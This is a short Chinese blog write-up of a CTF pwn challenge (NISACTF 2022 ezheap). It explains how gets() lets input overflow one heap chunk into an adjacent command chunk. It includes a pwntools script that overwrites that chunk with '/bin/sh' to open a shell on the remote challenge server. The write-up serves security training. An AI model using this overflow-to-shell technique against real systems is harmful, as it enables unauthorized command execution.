NSSCTF Pwn [NISACTF 2022]ezheap WP

艾莉莉阿文

于 2025-02-20 16:00:07 发布

阅读量196

点赞数 1

分类专栏： BUUCTF Pwn 文章标签：网络安全

本文链接：https://blog.youkuaiyun.com/qq_33348179/article/details/145749243

版权

BUUCTF 同时被 2 个专栏收录

71 篇文章

订阅专栏

Pwn

57 篇文章

订阅专栏

下载得到文件 exeinfo checksec

32位用IDA32打开

查看main函数

程序创建了两个堆并且执行了command堆里的指令

存在gets函数可以实现堆溢出

动态调试查看堆

可以看到堆的大小是0x20 而且两个堆相邻

直接在gets的时候用0x20的数据填充至command堆的内容区域就行了

exp：

from pwn import *
#p = process('./pwn')
p = remote("node5.anna.nssctf.cn", 20850)
context.log_level = 'debug'

#gdb.attach(p)
#pause()

payload = b'a' * (0x20) + b'/bin/sh\x00'
p.sendline(payload)
p.interactive()

运行，得到flag：